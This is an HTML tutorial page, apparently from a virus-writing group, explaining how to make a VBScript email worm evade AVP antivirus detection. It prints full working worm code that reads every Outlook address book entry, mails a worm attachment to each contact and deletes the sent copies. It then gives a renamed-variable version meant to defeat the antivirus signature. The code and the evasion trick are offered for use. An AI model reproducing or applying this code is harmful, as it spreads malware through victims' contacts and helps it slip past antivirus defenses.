<!-- saved from url=(0022)http://internet.e-mail -->
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>Anti Avp Vbs I-Worms Detection. By [K]Alamar</title>
<base target="_blank">
</head>

<body>

<p align="center"><b><u><font face="Verdana" size="3">Anti Avp Vbs I-Worms
Detection. By [K]Alamar</font></u></b></p>
<div align="center">
  <center>
  <table border="0" width="70%">
    <tr>
      <td width="100%"><font face="Verdana" size="2">In one of the last Updates,
        the Avp antivirus has added a detection for i-Worms that uses the
        Outlook replication method, used in almost all the Vbs and Js worms,
        Like the I Love you, Bubbleboy and all of them.<br>
        Ok, this will made your I-worm undetectable for avp till they add it to
        the database; i'm pretty sure that if in your worm you use Outlook
        replication you use this code, or one similar:<br>
        ---<br>
        <b>Dim fso, ws<br>
        Set fso = CreateObject("Scripting.filesystemobject")<br>
        Set ws = CreateObject("WScript.Shell")<br>
        Set OApp = CreateObject("Outlook.Application")<br>
        if oapp=&quot;Outlook&quot; then<br>
        Set Mapi = OApp.GetNameSpace("MAPI")<br>
        For Each AddList In Mapi.AddressLists<br>
        If AddList.AddressEntries.Count &lt;> 0 Then<br>
        For AddListCount = 1 To AddList.AddressEntries.Count *<br>
        Set AddListEntry = AddList.AddressEntries(AddListCount)<br>
        Set msg = OApp.CreateItem(0)<br>
        msg.To = AddListEntry.Address<br>
        msg.Subject = &quot;Your subject&quot;<br>
        msg.Body = &quot;The body&quot;<br>
        msg.Attachments.Add &quot;path to your Worm&quot;<br>
        msg.DeleteAfterSubmit = True<br>
        If msg.To &lt;> "" Then<br>
        msg.Send<br>
        End If<br>
        Next<br>
        End If<br>
        Next<br>
        end if<br>
        </b>---<br>
        The only thing that you should do is add one line and change another,
        like here (lines with * are the modified ones):<br>
        ---<br>
        <b>Dim fso, ws<br>
        Set fso = CreateObject("Scripting.filesystemobject")<br>
        Set ws = CreateObject("WScript.Shell")<br>
        Set OApp = CreateObject("Outlook.Application")<br>
        if oapp=&quot;Outlook&quot; then<br>
        Set Mapi = OApp.GetNameSpace("MAPI")<br>
        For Each AddList In Mapi.AddressLists<br>
        If AddList.AddressEntries.Count &lt;> 0 Then<br>
        AddlistCount = AddList.AddressEntries.Count *<br>
        For AddListCount = 1 To </b><b>AddlistCount *<br>
        Set AddListEntry = AddList.AddressEntries(AddListCount)<br>
        Set msg = OApp.CreateItem(0)<br>
        msg.To = AddListEntry.Address<br>
        msg.Subject = &quot;Your subject&quot;<br>
        msg.Body = &quot;The body&quot;<br>
        msg.Attachments.Add &quot;path to your Worm&quot;<br>
        msg.DeleteAfterSubmit = True<br>
        If msg.To &lt;> "" Then<br>
        msg.Send<br>
        End If<br>
        Next<br>
        End If<br>
        Next<br>
        end if<br>
        </b>---<br>
        You should delete the &quot;*&quot; if you want the worm to work.<br>
        I think that if you know something about I-Worms you should understood
        what i did; i just create a new variable, <b>AddlistCount </b>, and make
        it be like the number of addressentries, and then i use that new
        variable in the next line.<br>
        <br>
        I hope you understood This.<br>
        [K]Alamar - <a href="mailto:kalamar@virii.com.ar">kalamar@virii.com.ar<br>
        </a>Member <a href="Http://www.virii.com.ar">Virii Argentina</a><br>
        <a href="Http://www.virii.com.ar">Http://www.virii.com.ar</a></font></td>
    </tr>
  </table>
  </center>
</div>

</body>

</html>
